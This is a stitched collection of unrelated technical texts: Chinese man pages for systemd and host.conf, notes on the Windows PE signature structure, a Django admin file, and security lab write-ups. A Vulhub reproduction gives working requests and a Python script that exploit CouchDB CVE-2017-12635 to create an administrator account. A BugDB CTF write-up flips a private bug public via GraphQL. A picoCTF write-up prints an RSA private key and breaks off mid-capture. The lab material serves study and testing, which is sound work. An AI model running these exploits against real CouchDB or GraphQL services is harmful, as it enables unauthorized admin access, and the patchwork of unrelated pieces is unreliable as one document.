\&.\&.\&.\fR 命令启用它们, 因此安装的单元有可能会在开机时自动启动。 .SH "移植已有的守护进程" .PP 虽然 systemd 兼容传统的 SysV 初始化系统, 但是移植旧有的守护进程可以更好的利用 systemd 的先进特性。 建议对旧有的 SysV 守护进程做如下改进: \&.\&.\&.[省略]\&.\&.\&. .SH "放置守护进程的数据" .PP 建议遵守 \fBfile-hierarchy\fR(7) 所建议的通用准则。 .SH "参见" .PP \fBsystemd\fR(1), \fBsd-daemon\fR(3), \fBsd_listen_fds\fR(3), \fBsd_notify\fR(3), \fBdaemon\fR(3), \fBsystemd.service\fR(5), \fBfile-hierarchy\fR(7) .SH "NOTES" .IP " 1." 4 LSB recommendations for SysV init scripts .RS 4 \%http://refspecs.linuxbase.org/LSB_3.1.1/LSB-Core-generic/LSB-Core-generic/iniscrptact.html .RE .IP " 2." 
4 Apple MacOS X Daemon Requirements .RS 4 \%https://developer.apple.com/library/mac/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html .RE .\" manpages-zh translator: 金步国 .\" manpages-zh comment: 金步国作品集:http://www.jinbuguo.com
.\" 版权所有(c) 1997 Martin Schulze (joey@infodrom.north.de) .\" 中文版版权所有 riser,www.linuxforum.net 2000 .\" .\" 这是免费的文档; .\" 你可以遵照自由软件基金会出版的 GNU 通用出版许可版本 2 .\" 或者更高版本的条例来重新发布和/或修改它. .\" .\" GNU通用出版许可中涉及到的"目标代码 (object code) "和" 可执行程序 .\" (executables)"可解释为任意文档格式化的输出或者排版系统, .\" 包括中间的和已输出的结果. .\" .\" 该文档的发布寄望于能够实用,但并不做任何担保; .\" 甚至也不提供隐含的商品性的保证或者针对特殊目的适用性. .\" 参见GNU通用版权许可以获知详情. .\" .\" 你应该接收到与本文档一同发布的GNU通用版权许可的副本; .\" 如果没有,请写信到自由软件基金会 .\" (Free Software Foundation), Inc., 675 Mass Ave, Cambridge, MA 02139, USA. .\" .\" 许多文本复制于resolv+(8)的手册页. .TH HOST.CONF 5 "1997年2月2日" "Debian/GNU Linux" "(Linux系统管理)" .SH NAME (名称) host.conf \- 解析配置文件 .SH DESCRIPTION (描述) 文件 .I /etc/host.conf 包含了为解析库声明的配置信息. 它应该每行含一个配置关键字, 其后跟着合适的配置信息. 系统识别的关键字有: .IR order ", " trim ", " multi ", " nospoof "和 " reorder. 每个关键字在下面将分别进行介绍: .TP .I order 这个关键字确定了主机查询是如何执行的. 它后面应该跟随一个或者更多的查询方式, 这些查询方式用逗号分隔. 有效的方式有: .IR bind ", " hosts "和 " nis . .TP .I trim 这个关键字可以多次出现. 每次出现其后应该跟随单个的以句点开头的域名. 如果设置了它, resolv+ 库会自动截去任何通过 DNS 解析出来的主机名后面的域名. 这个选项用于本地主机和域. (相关信息: trim 对于通过 NIS 或者 hosts 文件获取的主机名无效. 需要注意的是要确保在 hosts 文件中的每条记录的 第一个主机名是全名或者非全名, 以适合于本地安装.) .TP .I multi 有效的值为: .IR on "和 "off . 如果设置为 .IR on , resolv+ 库会返回一台主机在 .I /etc/hosts 文件中出现的的所有有效地址, 而不只是第一个. 默认情况下设为 .I off , 否则可能会导致拥有庞大 hosts 文件的站点潜在的性能损失. .TP .I nospoof 有效的值为: .IR on " 和 "off . 如果设置为 .IR on , resolv+ 库会尝试阻止主机名欺骗以提高使用 .BR rlogin " 和 "rsh 的安全性. 它是如下这样工作的: 在执行了一个主机地址的查询之后, resolv+ 会对该地址执行一次主机名的查询. 如果两者不匹配, 查询即失败. .TP .I spoofalert 如果该选项设为 .I on 同时也设置了 .I nospoof 选项, resolv+ 会通过 syslog 设施记录错误报警信息. 默认的值为 .IR off . .TP .I reorder 有效的值为 .IR on " 和 "off . 如果设置为 .IR on , resolv+ 会试图重新排列主机地址, 以便执行 .BR gethostbyname (3) 时, 首先列出本地地址(即在同一子网中的地址). 重新排序适合于所有查询方式. 默认的值为 .IR off . .SH FILES(相关文件) .TP .I /etc/host.conf 解析配置文件 .TP .I /etc/resolv.conf 解析配置文件 .TP .I /etc/hosts 本地主机数据库 .SH SEE ALSO(又见) .BR gethostbyname (3), .BR hostname (7), .BR resolv+ (8), .BR named (8) .SH "[中文版维护人]" .B riser <boomer@ccidnet.com> .SH "[中文版最新更新]" .B 2000/11/26 .SH "《中国linux论坛man手册页翻译计划》:" .BI http://cmpp.linuxforum.net
# CouchDB Vertical Privilege Escalation (CVE-2017-12635)

Apache CouchDB is an open-source database focused on ease of use and on being "a database that completely embraces the web". It is a NoSQL database that uses JSON as its storage format, JavaScript as its query language, and MapReduce and HTTP as its API. It is widely deployed; for example, the BBC uses it in its dynamic content platform, Credit Suisse uses it in the market framework of its internal commodities department, and Meebo uses it in its social platform (web and applications).

On November 15, 2017, CVE-2017-12635 and CVE-2017-12636 were disclosed. CVE-2017-12635 is caused by Erlang and JavaScript parsing the same JSON document differently, so the same statement is evaluated inconsistently. The flaw lets an arbitrary user create an administrator account — a vertical privilege escalation vulnerability.

Affected versions: < 1.7.0 and < 2.1.1

References:

- http://bobao.360.cn/learning/detail/4716.html
- https://justi.cz/security/2017/11/14/couchdb-rce-npm.html

## Test Environment

Build and start the environment:

```
docker compose build
docker compose up -d
```

Once the environment is up, visit `http://your-ip:5984/_utils/` and you will see a web page, which means CouchDB started successfully. We do not know the password, however, so we cannot log in.

## Reproducing the Vulnerability

First, send the following request:

```
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}
```

As you can see, a 403 error is returned: `{"error":"forbidden","reason":"Only _admin may set roles"}` — only an administrator may set the roles field:

![](1.png)

Sending a request that contains two `roles` keys bypasses the restriction:

```
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}
```

An administrator account is created, with both username and password `vulhub`:

![](2.png)

Visit `http://your-ip:5984/_utils/` again and log in with the `vulhub` credentials; the login succeeds:

![](3.png)
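The same request can be scripted. A minimal sketch with Python's `requests` — the target URL is a placeholder, and note that the body must be a raw string, since a Python dict cannot hold the duplicate key that the bypass depends on:

```python
import requests

# Hypothetical target; replace with the lab's actual IP.
target = "http://your-ip:5984"

# The duplicated "roles" key is the whole trick: CouchDB's Erlang parser takes
# the first value (["_admin"]) while the JavaScript validation function sees
# the second ([]), so the "Only _admin may set roles" check passes.
payload = (
    '{"type": "user", "name": "vulhub", "roles": ["_admin"], '
    '"roles": [], "password": "vulhub"}'
)

r = requests.put(
    target + "/_users/org.couchdb.user:vulhub",
    data=payload,
    headers={"Content-Type": "application/json"},
)
print(r.status_code, r.text)
```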
# Signatures

---

## Digital Signature Structure

```c++
typedef struct _WIN_CERTIFICATE {
    DWORD dwLength;
    WORD  wRevision;
    WORD  wCertificateType; // WIN_CERT_TYPE_xxx
    BYTE  bCertificate[ANYSIZE_ARRAY];
} WIN_CERTIFICATE, *LPWIN_CERTIFICATE;
```

* dwLength: the length of this structure.
* wRevision: the revision of the certificate held in bCertificate. There are two revisions, listed in the table below; 0x0200 is the usual value.

| Value | Meaning | Macro name in the Win32 SDK |
| - | - | - |
| 0x0100 | Legacy version of WIN_CERTIFICATE | WIN_CERT_REVISION_1_0 |
| 0x0200 | Current version of WIN_CERTIFICATE | WIN_CERT_REVISION_2_0 |

* wCertificateType: the certificate type, one of the following:

| Value | Meaning | Macro name in the Win32 SDK |
| - | - | - |
| 0x0001 | X.509 certificate | WIN_CERT_TYPE_X509 |
| 0x0002 | PKCS#7 SignedData structure | WIN_CERT_TYPE_PKCS_SIGNED_DATA |
| 0x0003 | Reserved | WIN_CERT_TYPE_RESERVED_1 |
| 0x0004 | Terminal Server protocol stack certificate signing | WIN_CERT_TYPE_TS_STACK_SIGNED |

* bCertificate: holds one or more certificates; generally the certificate data extends to the end of the security table. The size of bCertificate must be 8-byte aligned.
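A minimal sketch of reading the WIN_CERTIFICATE header with Python's `struct` module. The security directory's offset and size come from entry 4 of the optional header's data directory; the values and file name below are hypothetical placeholders:

```python
import struct

# Hypothetical values: in a real PE they come from data directory entry 4
# (IMAGE_DIRECTORY_ENTRY_SECURITY). Note this entry holds a raw file offset,
# not an RVA.
security_offset = 0x1A600
security_size = 0x1D38

with open("signed.exe", "rb") as f:  # hypothetical file name
    f.seek(security_offset)
    blob = f.read(security_size)

# WIN_CERTIFICATE header: DWORD dwLength, WORD wRevision, WORD wCertificateType
dw_length, w_revision, w_cert_type = struct.unpack_from("<IHH", blob, 0)
print(hex(dw_length), hex(w_revision), hex(w_cert_type))

# The certificate data itself (normally a PKCS#7 SignedData when type == 0x0002)
b_certificate = blob[8:dw_length]
```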
from django.contrib import admin

from .models import Collection, Collection2

# Register your models here.
admin.site.register(Collection)
admin.site.register(Collection2)
# BugDB v2 - FLAG0

## 0x00 Overview

Pretty much the same as [BugDB v1][1]. The only difference is a tiny change in how the data is mutated.

## 0x01 Take a Tour

### allUsers

Users no longer expose their bugs.

```graphql
query{
  allUsers {
    edges {
      node {
        id
        username
      }
    }
  }
}
```

![](./imgs/allUsers.jpg)

### allBugs

There is only one bug in the array, and it is marked as NOT PRIVATE.

```graphql
query{
  allBugs {
    id
    reporter {
      id
      username
    }
    reporterId
    text
    private
  }
}
```

![](./imgs/allBugs.jpg)

The bug id can be [decoded][2]:

```
base64decode(QnVnczox) = Bugs:1
```

### mutation

Try modifying Bugs:2:

```graphql
mutation{
  modifyBug(id:2, private:false) {
    ok
  }
}
```

![](./imgs/mutation.jpg)

## 0x02 FLAG

Go check allBugs again.

```graphql
query{
  allBugs {
    id
    reporter {
      id
      username
    }
    reporterId
    text
    private
  }
}
```

Get the FLAG:

![](./imgs/flag.jpg)

[1]: ../../bugdb_v1/flag0
[2]: https://www.base64decode.org/
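The same mutation-then-query flow can also be driven from a script instead of the GraphQL explorer. A minimal sketch — the endpoint URL is a hypothetical placeholder, and a real run would likely need the challenge's session cookies:

```python
import requests

# Hypothetical endpoint; the challenge normally runs these from its
# built-in GraphQL explorer.
url = "https://example.com/graphql"

mutation = "mutation { modifyBug(id:2, private:false) { ok } }"
query = "{ allBugs { id text private } }"

s = requests.Session()
print(s.post(url, json={"query": mutation}).json())  # flip Bugs:2 to public
print(s.post(url, json={"query": query}).json())     # re-read allBugs for the flag
```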
# WebNet0

Forensics, 350 points

## Description:

> We found this packet capture and key. Recover the flag.

## Solution:

We receive a network capture:

```console
root@kali:/media/sf_CTFs/pico/WebNet0# tshark -r capture.pcap
Running as user "root" and group "root". This could be dangerous.
    1 0.000000 128.237.140.23 → 172.31.22.220 TCP 78 57567 → 443 [SYN] Seq=0 Win=65535 Len=0 MSS=1386 WS=64 TSval=132865167 TSecr=0 SACK_PERM=1 57567 443
    2 0.000029 172.31.22.220 → 128.237.140.23 TCP 74 443 → 57567 [SYN, ACK] Seq=0 Ack=1 Win=26847 [TCP CHECKSUM INCORRECT] Len=0 MSS=8961 SACK_PERM=1 TSval=568332748 TSecr=132865167 WS=128 443 57567
    3 0.025161 128.237.140.23 → 172.31.22.220 TCP 78 57578 → 443 [SYN] Seq=0 Win=65535 Len=0 MSS=1386 WS=64 TSval=132865192 TSecr=0 SACK_PERM=1 57578 443
    4 0.025171 172.31.22.220 → 128.237.140.23 TCP 74 443 → 57578 [SYN, ACK] Seq=0 Ack=1 Win=26847 [TCP CHECKSUM INCORRECT] Len=0 MSS=8961 SACK_PERM=1 TSval=568332773 TSecr=132865192 WS=128 443 57578
    5 0.028804 128.237.140.23 → 172.31.22.220 TCP 66 57567 → 443 [ACK] Seq=1 Ack=1 Win=131904 Len=0 TSval=132865195 TSecr=568332748 57567 443
    6 0.028881 128.237.140.23 → 172.31.22.220 TLSv1 583 Client Hello 57567 443
    7 0.028902 172.31.22.220 → 128.237.140.23 TCP 66 443 → 57567 [ACK] Seq=1 Ack=518 Win=28032 [TCP CHECKSUM INCORRECT] Len=0 TSval=568332777 TSecr=132865195 443 57567
    8 0.029538 172.31.22.220 → 128.237.140.23 TLSv1.2 1073 Server Hello, Certificate, Server Hello Done 443 57567
    9 0.053871 128.237.140.23 → 172.31.22.220 TCP 66 57578 → 443 [ACK] Seq=1 Ack=1 Win=131904 Len=0 TSval=132865219 TSecr=568332773 57578 443
   10 0.058387 128.237.140.23 → 172.31.22.220 TLSv1 583 Client Hello 57578 443
   11 0.058417 172.31.22.220 → 128.237.140.23 TCP 66 443 → 57578 [ACK] Seq=1 Ack=518 Win=28032 [TCP CHECKSUM INCORRECT] Len=0 TSval=568332806 TSecr=132865222 443 57578
   12 0.058429 128.237.140.23 → 172.31.22.220 TCP 66 57567 → 443 [ACK] Seq=518 Ack=1008 Win=130880 Len=0 TSval=132865222 TSecr=568332777 57567 443
   13 0.058743 172.31.22.220 → 128.237.140.23 TLSv1.2 1073 Server Hello, Certificate, Server Hello Done 443 57578
   14 0.059645 128.237.140.23 → 172.31.22.220 TLSv1.2 384 Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message 57567 443
   15 0.061383 172.31.22.220 → 128.237.140.23 TLSv1.2 324 New Session Ticket, Change Cipher Spec, Encrypted Handshake Message 443 57567
   16 0.088416 128.237.140.23 → 172.31.22.220 TCP 66 57578 → 443 [ACK] Seq=518 Ack=1008 Win=130880 Len=0 TSval=132865247 TSecr=568332806 57578 443
   17 0.092408 128.237.140.23 → 172.31.22.220 TCP 78 57581 → 443 [SYN] Seq=0 Win=65535 Len=0 MSS=1386 WS=64 TSval=132865249 TSecr=0 SACK_PERM=1 57581 443
   18 0.092423 172.31.22.220 → 128.237.140.23 TCP 74 443 → 57581 [SYN, ACK] Seq=0 Ack=1 Win=26847 [TCP CHECKSUM INCORRECT] Len=0 MSS=8961 SACK_PERM=1 TSval=568332840 TSecr=132865249 WS=128 443 57581
   19 0.092429 128.237.140.23 → 172.31.22.220 TLSv1.2 384 Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message 57578 443
   20 0.093713 128.237.140.23 → 172.31.22.220 TCP 66 57567 → 443 [ACK] Seq=836 Ack=1266 Win=130752 Len=0 TSval=132865252 TSecr=568332809 57567 443
   21 0.094104 172.31.22.220 → 128.237.140.23 TLSv1.2 324 New Session Ticket, Change Cipher Spec, Encrypted Handshake Message 443 57578
   22 0.122048 128.237.140.23 → 172.31.22.220 TCP 66 57581 → 443 [ACK] Seq=1 Ack=1 Win=131904 Len=0 TSval=132865276 TSecr=568332840 57581 443
   23 0.122203 128.237.140.23 → 172.31.22.220 TLSv1 583 Client Hello 57581 443
   24 0.122220 172.31.22.220 → 128.237.140.23 TCP 66 443 → 57581 [ACK] Seq=1 Ack=518 Win=28032 [TCP CHECKSUM INCORRECT] Len=0 TSval=568332870 TSecr=132865276 443 57581
   25 0.122552 172.31.22.220 → 128.237.140.23 TLSv1.2 1073 Server Hello, Certificate, Server Hello Done 443 57581
   26 0.123046 128.237.140.23 → 172.31.22.220 TCP 66 57578 → 443 [ACK] Seq=836 Ack=1266 Win=130752 Len=0 TSval=132865277 TSecr=568332842 57578 443
   27 0.151669 128.237.140.23 → 172.31.22.220 TCP 66 57581 → 443 [ACK] Seq=518 Ack=1008 Win=130880 Len=0 TSval=132865303 TSecr=568332870 57581 443
   28 0.152210 128.237.140.23 → 172.31.22.220 TLSv1.2 384 Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message 57581 443
   29 0.153206 172.31.22.220 → 128.237.140.23 TLSv1.2 324 New Session Ticket, Change Cipher Spec, Encrypted Handshake Message 443 57581
   30 0.183385 128.237.140.23 → 172.31.22.220 TCP 66 57581 → 443 [ACK] Seq=836 Ack=1266 Win=130752 Len=0 TSval=132865334 TSecr=568332901 57581 443
   31 0.187804 128.237.140.23 → 172.31.22.220 TLSv1.2 506 Application Data 57581 443
   32 0.188303 172.31.22.220 → 128.237.140.23 TLSv1.2 1299 Application Data 443 57581
   33 0.220287 128.237.140.23 → 172.31.22.220 TCP 66 57581 → 443 [ACK] Seq=1276 Ack=2499 Win=129792 Len=0 TSval=132865368 TSecr=568332936 57581 443
   34 0.357102 128.237.140.23 → 172.31.22.220 TLSv1.2 521 Application Data 57567 443
   35 0.357544 172.31.22.220 → 128.237.140.23 TLSv1.2 576 Application Data 443 57567
   36 0.386999 128.237.140.23 → 172.31.22.220 TCP 66 57567 → 443 [ACK] Seq=1291 Ack=1776 Win=130560 Len=0 TSval=132865528 TSecr=568333105 57567 443
   37 0.817074 128.237.140.23 → 172.31.22.220 TLSv1.2 438 Application Data 57567 443
   38 0.817393 172.31.22.220 → 128.237.140.23 TLSv1.2 637 Application Data 443 57567
   39 0.847407 128.237.140.23 → 172.31.22.220 TCP 66 57567 → 443 [ACK] Seq=1663 Ack=2347 Win=130496 Len=0 TSval=132865963 TSecr=568333565 57567 443
```

And a key file:

```console
root@kali:/media/sf_CTFs/pico/WebNet0# openssl rsa -in picopico.key -text
RSA Private-Key: (2048 bit, 2 primes)
modulus:
    00:b0:2a:51:4f:34:a8:ec:78:91:79:a6:e0:89:53:
    9c:77:f1:77:13:d5:e4:20:7b:9c:ce:28:d6:a1:02:
    56:2e:76:f1:95:38:4b:3a:d5:39:c8:82:f7:04:47:
    89:28:f2:2d:ce:0b:06:a4:db:f6:ad:70:69:37:a3:
    3f:63:14:a7:a9:ed:71:44:60:d3:f7:d4:8c:30:0f:
    d8:ff:61:ac:e5:2b:2e:03:44:b1:8e:6c:ec:88:65:
    45:35:7f:65:91:03:b5:21:7f:43:ce:41:7b:03:4f:
    5a:14:5f:7d:a3:30:a6:64:41:24:83:5b:83:11:65:
    df:6d:ac:96:1d:3b:64:eb:70:43:cc:b0:18:99:42:
    51:65:be:09:cd:c2:5d:d0:95:ac:28:cd:31:cb:00:
    92:88:df:a8:f5:70:fc:12:30:c7:8d:71:ad:5e:d1:
    98:b5:b3:b4:79:23:17:e1:a4:d5:ce:04:5d:05:9b:
    18:96:be:67:8e:1d:b6:ac:a7:21:e0:f1:41:26:18:
    1a:e4:77:89:38:c1:74:8a:19:0b:eb:73:c4:23:c9:
    c3:f8:49:c1:1d:aa:ec:49:89:89:c3:4f:c8:84:6c:
    0a:bb:d3:fe:df:ff:93:48:37:50:c4:f5:8a:06:26:
    a2:98:8d:34:bd:9d:13:c1:e1:8b:e3:24:df:d2:26:
    78:6f
publicExponent: 65537 (0x10001)
privateExponent:
    08:29:dd:dc:ba:c6:fd:36:55:1f:7b:11:3a:ab:ea:
    3b:50:b0:40:f6:0f:7d:45:dd:2d:5c:8d:1d:a6:fb:
    11:6a:27:a5:cf:97:04:e1:ee:ac:91:0d:1b:60:a9:
    45:81:7b:87:e9:d0:e4:00:e1:7c:86:12:0a:27:01:
    7f:f8:ec:10:1e:d5:b9:e2:76:d0:2c:44:56:d1:d5:
    2f:78:7a:47:a0:69:a0:73:25:7b:41:26:f0:e7:28:
    7e:e3:29:74:bf:e4:3b:ea:26:dd:3f:01:91:54:b3:
    0a:f0:a5:e4:d3:13:52:e0:05:ee:24:66:7d:7e:e8:
    0c:b0:0b:c0:cd:08:cf:34:2f:da:e9:fe:d9:49:93:
    d7:9a:e0:01:97:e5:dc:82:f5:3c:6b:c9:85:b8:4b:
    c5:f7:9e:c8:f1:3d:30:1c:b5:4a:a0:63:43:da:cd:
    16:7f:2c:42:ff:79:f4:9e:81:1f:3e:1b:12:92:bf:
    fc:4a:ed:34:fd:b2:87:ba:22:54:10:60:28:44:35:
    80:4b:8e:8d:00:bf:e2:8c:68:a8:21:5f:65:a7:fd:
    5c:d4:42:c4:1f:f3:63:59:d4:a6:bb:c9:cb:3d:3d:
    34:c4:16:34:5d:84:9a:f9:81:54:67:e8:4f:19:ae:
    ba:de:4d:d0:66:d5:af:65:32:1f:15:8c:2a:6d:ac:
    39
prime1:
    00:e9:6f:6f:80:5a:05:a5:1a:d7:ad:b8:b2:89:7c:
    9b:3c:76:77:7a:2e:19:da:7d:b2:82:39:73:0e:4f:
    af:2a:30:14:68:4e:90:6d:55:32:d1:55:23:6f:58:
    29:bc:9b:84:d3:11:ac:d7:e3:e6:40:f9:b2:45:c1:
    41:70:68:04:c3:98:77:2b:ea:53:08:de:d3:4a:ad:
    cb:27:63:61:7b:a3:92:38:cf:a9:b0:b9:1b:92:7a:
    cc:ea:fe:77:71:66:a0:b3:c0:2b:b8:9c:a8:b1:87:
    77:33:9e:9e:e3:26:21:25:34:6d:1d:f0:bb:b9:79:
    08:26:54:02:b5:02:15:97:7d
prime2:
    00:c1:31:af:60:6b:b5:49:50:fe:29:cd:c1:e7:58:
    0a:22:df:83:a9:7e:3b:d0:61:e1:a5:20:a2:f7:00:
    a3:b8:39:e7:5a:1d:d1:fd:aa:27:78:d4:f4:07:9c:
    be:ce:df:1c:cd:eb:af:52:90:b6:79:b3:47:7c:f0:
    0f:cb:14:b9:38:a1:93:4c:29:d9:12:4d:02:10:f8:
    03:1b:5c:7d:35:1c:61:6f:9c:23:ae:3e:0f:c5:6c:
    da:75:c1:2e:f3:24:48:39:bb:91:c5:41:6c:8c:3c:
    d2:4b:af:f8:59:ea:0d:98:a7:e5:06:a4:07:06:4f:
    03:3f:44:23:d5:00:f8:4b:5b
exponent1:
    00:c0:07:43:9a:3a:73:da:56:32:86:5e:21:c0:a8:
    18:ab:ac:68:ac:c1:af:d2:e5:04:2b:cc:46:b1:c7:
    2b:39:71:43:d8:6a:88:b4:e8:19:5d:ca:c3:d3:9c:
    9a:f8:e4:96:67:6b:6a:dc:4e:45:e3:bd:84:c1:8d:
    30:df:df:31:cc:15:68:33:60:17:de:7c:2f:24:87:
    c3:4f:2b:99:cd:b3:c9:5d:a2:b6:dd:01:e9:84:9e:
    30:64:3f:e0:d2:10:b2:b2:2b:ab:cb:ba:53:ab:76:
    dc:c0:42:04:42:a7:e3:2c:4f:ec:53:6c:ed:80:ad:
    e7:de:5f:cd:ba:49:74:a9:a1
exponent2:
    2d:af:9c:33:87:05:05:e3:7b:57:53:6b:09:54:4e:
    81:54:ae:04:04:f0:0c:25:39:81:1d:28:ac:94:a0:
    22:ce:be:a1:16:f0:33:b6:6b:43:2d:c8:cf:8c:07:
    ab:50:23:b5:a6:88:7d:53:ef:72:f4:2c:71:a5:2b:
    76:f0:dd:a4:40:c1:5e:7f:7e:ef:ce:fa:30:1d:16:
    4f:00:1e:33:d3:14:4f:9a:72:ed:9f:8b:87:3a:68:
    a6:f4:1a:30:31:62:4b:14:ca:32:05:78:af:e9:2a:
    29:ef:e1:21:12:32:48:e9:5b:45:a8:c0:68:83:82:
    d7:11:3c:10:00:fc:b6:85
coefficient:
    7c:43:35:ad:f3:34:bf:75:26:07:b3:d2:ea:ed:26:
    3f:77:24:3f:60:85:09:d6:ab:c9:73:df:0b:9d:86:
    05:c2:77:43:8e:98:a6:c4:2f:2d:35:68:b4:cf:ad:
    78:7b:d3:8c:dc:36:8f:0c:19:c4:89:78:35:e9:c6:
    48:48:f7:28:38:50:a0:e8:90:0b:d0:6b:0c:3f:83:
    07:82:3d:f9:3f:67:c5:3d:e0:ed:1e:8c:ae:02:13:
    82:10:78:59:ee:d3:56:12:ff:3e:58:e7:25:3c:83:
    aa:98:cd:03:89:18:4e:f7:80:24:fb:fa:5e:ad:44:
    46:de:4f:52:d5:f7:06:a4
writing RSA key
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAsCpRTzSo7HiReabgiVOcd/F3E9XkIHuczijWoQJWLnbxlThL
OtU5yIL3BEeJKPItzgsGpNv2rXBpN6M/YxSnqe1xRGDT99SMMA/Y/2Gs5SsuA0Sx
jmzsiGVFNX9lkQO1IX9DzkF7A09aFF99ozCmZEEkg1uDEWXfbayWHTtk63BDzLAY
mUJRZb4JzcJd0JWsKM0xywCSiN+o9XD8EjDHjXGtXtGYtbO0eSMX4aTVzgRdBZsY
lr5njh22rKch4PFBJhga5HeJOMF0ihkL63PEI8nD+EnBHarsSYmJw0/IhGwKu9P+
3/+TSDdQxPWKBiaimI00vZ0TweGL4yTf0iZ4bwIDAQABAoIBAAgp3dy6xv02VR97
ETqr6jtQsED2D31F3S1cjR2m+xFqJ6XPlwTh7qyRDRtgqUWBe4fp0OQA4XyGEgon
AX/47BAe1bnidtAsRFbR1S94ekegaaBzJXtBJvDnKH7jKXS/5DvqJt0/AZFUswrw
peTTE1LgBe4kZn1+6AywC8DNCM80L9rp/tlJk9ea4AGX5dyC9TxryYW4S8X3nsjx
PTActUqgY0PazRZ/LEL/efSegR8+GxKSv/xK7TT9soe6IlQQYChENYBLjo0Av+KM
aKghX2Wn/VzUQsQf82NZ1Ka7ycs9PTTEFjRdhJr5gVRn6E8ZrrreTdBm1a9lMh8V
jCptrDkCgYEA6W9vgFoFpRrXrbiyiXybPHZ3ei4Z2n2ygjlzDk+vKjAUaE6QbVUy
0VUjb1gpvJuE0xGs1+PmQPmyRcFBcGgEw5h3K+pTCN7TSq3LJ2Nhe6OSOM+psLkb
knrM6v53cWags8AruJyosYd3M56e4yYhJTRtHfC7uXkIJlQCtQIVl30CgYEAwTGv
YGu1SVD+Kc3B51gKIt+DqX470GHhpSCi9wCjuDnnWh3R/aoneNT0B5y+zt8czeuv
UpC2ebNHfPAPyxS5OKGTTCnZEk0CEPgDG1x9NRxhb5wjrj4PxWzadcEu8yRIObuR
xUFsjDzSS6/4WeoNmKflBqQHBk8DP0Qj1QD4S1sCgYEAwAdDmjpz2lYyhl4hwKgY
q6xorMGv0uUEK8xGsccrOXFD2GqItOgZXcrD05ya+OSWZ2tq3E5F472EwY0w398x
zBVoM2AX3nwvJIfDTyuZzbPJXaK23QHphJ4wZD/g0hCysiury7pTq3bcwEIEQqfj
LE/sU2ztgK3n3l/Nukl0qaECgYAtr5wzhwUF43tXU2sJVE6BVK4EBPAMJTmBHSis
lKAizr6hFvAztmtDLcjPjAerUCO1poh9U+9y9CxxpSt28N2kQMFef37vzvowHRZP
AB4z0xRPmnLtn4uHOmim9BowMWJLFMoyBXiv6Sop7+EhEjJI6VtFqMBog4LXETwQ
APy2hQKBgHxDNa3zNL91Jgez0urtJj93JD9ghQnWq8lz3wudhgXCd0OOmKbELy01
aLTPrXh704zcNo8MGcSJeDXpxkhI9yg4UKDokAvQaww/gweCPfk/Z8U94O0ejK4C
E4IQeFnu01YS/z5Y5yU8g6qYzQOJGE73gCT7+l6tREbeT1LV9wak
-----END RSA PRIVATE KEY-----
```

We have three streams in this capture file:

```console
root@kali:/media/sf_CTFs/pico/WebNet0# tshark -r capture.pcap -T fields -e tcp.stream | sort -u
Running as user "root" and group "root". This could be dangerous.
0
1
2
```

However, they are encrypted and we can't view their contents without the appropriate key:

```console
root@kali:/media/sf_CTFs/pico/WebNet0# tshark -r capture.pcap -qz follow,tcp,ascii,0
Running as user "root" and group "root". This could be dangerous.

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 0
Node 0: 128.237.140.23:57567
Node 1: 172.31.22.220:443
517
................>..}............O]Ee.d..N....r.0.,.(.$... .......k.i.h.9.7.6.2...*.&.......=.5./.+.'.#...........g.?.>.3.1.0.1.-.).%.......<./......... .....a...7.5..2ec2-18-223-184-200.us-east-2.compute.amazonaws.com......... ..................... . ......................................................................................................................................................................................................................................................
	1007
	.....0\1.0...U....US1.0...U....Michigan1.0...U....Kalamazoo1.0...U.......0...0..........R..&j.....>Lf....$..0 ..Pico CTF1.0...U... 200811154129Z0\1.0...U....US1.0...U....Michigan1.0...U....Kalamazoo1.0...U. ..Pico CTF1.0...U... ..........0.."0 ......*QO4..x.y...S.w.w... {..(...V.v..8K:.9....G.(.-.......pi7.?c....qD`....0...a..+..D..l..eE5.e...!.C.A{.OZ._}.0.dA$.[..e.m...;d.pC....BQe....]...(.1.......p..0..q.^.....y#......].....g.....!..A&...w.8.t....s.#...I....I...O..l mo...E...yN.d...p..[m.b...zq........:...Ij..Q..L&........%...r..gJ6.29.T".*8..n....n.~+*...J.6.....yG...".7}...oO...k..G[3.-.8.(.gq."..(...... .....0&..9s...C.p....~.Qv............y.E...A]... \.D.2=C.c. ..B..m.r&.........
318
..g'\S.G#(.....t.(1Z9.PMB...;p.^#...PS..]....y|......mc.Vb..N....B[...._...nES.... .;p.0.|O..f.u..F.5id4..1 g..\.....X.f........C....2=eH.J&.ib.G.9....k;G.-.M.9 ..c#H.R..&.n..~.L.4.Hk........g.{rv....~_.....j..-..4vJ..h......_.CA..%7g...........(...B.r..zZ)..w.PRFD..:..z.DC.X>.O...F.#J
	258
	........w........(I62.........}.Ja#.Fx.7.Z..G.!..o.F..;..^T.L...K..8.....i.E...=F. .P......j...."$...7.#.g.dd..s.=...V._.....I0R.....9|..........#=,..xI.K..Qx.[v.__c... .-3..s...xTM..q.*............(..5.]fc....s. .F.O.........7s...~....-..
455
;E.....*.+*.<.B.1.n..sG+N........}.W.7....[?..+.k....J.P...Y....m.... .@(.k.....N%.......k ...v........y.Q.K&.i.s.. .b.`.i..Z/...`wpY.H...<.]W=.....@...L(O<.2-1aou.:.r...-....2!.Vv.`.D.YR..1y. =W...f.|.$...A......eZ-G...G.#e..[.w6-U..O.P&..&.......H..9..[......3g.e...~.[...4 t_.Z.r...7......../e.g<.....%.&>..C..p3.M.:..Z....,u........8>..P..9.K.$..8.*.....?..~2|p..i=e,..a..i..l...fHDMg.*7Z...uK..S.
	510
